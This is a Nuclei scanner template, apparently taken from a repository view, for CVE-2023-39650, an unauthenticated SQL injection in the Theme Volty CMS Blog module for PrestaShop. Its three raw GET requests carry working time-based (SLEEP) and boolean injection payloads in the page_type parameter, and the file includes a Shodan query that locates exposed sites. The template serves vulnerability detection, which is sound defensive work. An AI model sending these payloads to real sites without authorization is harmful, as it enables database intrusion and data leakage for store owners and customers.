nuclei-templates/http/cves/2023/CVE-2023-39650.yaml

64 lines
2.2 KiB
YAML
Raw Normal View History

2024-09-19 08:22:48 +00:00
id: CVE-2023-39650
info:
name: PrestaShop Theme Volty CMS Blog - SQL Injection
author: mastercho
severity: critical
description: |
In the module 'Theme Volty CMS Blog' (tvcmsblog) up to versions 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
reference:
- https://security.friendsofpresta.org/modules/2023/08/24/tvcmsblog.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-39650
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-39650
cwe-id: CWE-89
epss-score: 0.04685
epss-percentile: 0.91818
metadata:
max-request: 1
verified: true
framework: prestashop
shodan-query: html:"/tvcmsblog"
tags: cve,cve2023,prestashop,sqli,tvcmsblog
2024-09-12 08:55:38 +00:00
http:
- raw:
- |
@timeout: 20s
GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+(SELECT+7826+FROM+(SELECT(SLEEP(8)))oqFL)--+yxoW HTTP/1.1
2024-09-19 08:12:01 +00:00
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
@timeout: 20s
GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+5484=5484--+xhCs HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
@timeout: 20s
GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+5484=5485--+xhCs HTTP/1.1
2024-09-12 08:55:38 +00:00
Host: {{Hostname}}
2024-09-19 08:12:01 +00:00
Origin: {{BaseURL}}
2024-09-12 08:55:38 +00:00
host-redirects: true
matchers:
- type: dsl
name: time-based
dsl:
- 'duration_1>=8'
2024-09-19 08:12:01 +00:00
- 'status_code_1 == 200 && contains(body_1, "tvcmsblog")'
condition: and
- type: dsl
name: blind-based
dsl:
- 'status_code_2 == 200 && contains(body_2, "tvcmsblog")'
- 'status_code_2 == 200 && status_code_3 == 302'
2024-09-12 08:55:38 +00:00
condition: and
# digest: 4b0a00483046022100d836d1ae691f5a69f7bb0f843015b327c7bf075bcc534b89dba1e6bd2266109d022100d2eeba3d7626001ddc46d70cdcbce9f19d5f91678fcabcaa3b4fab576317760b:922c64590222798bb761d5b6d8e72950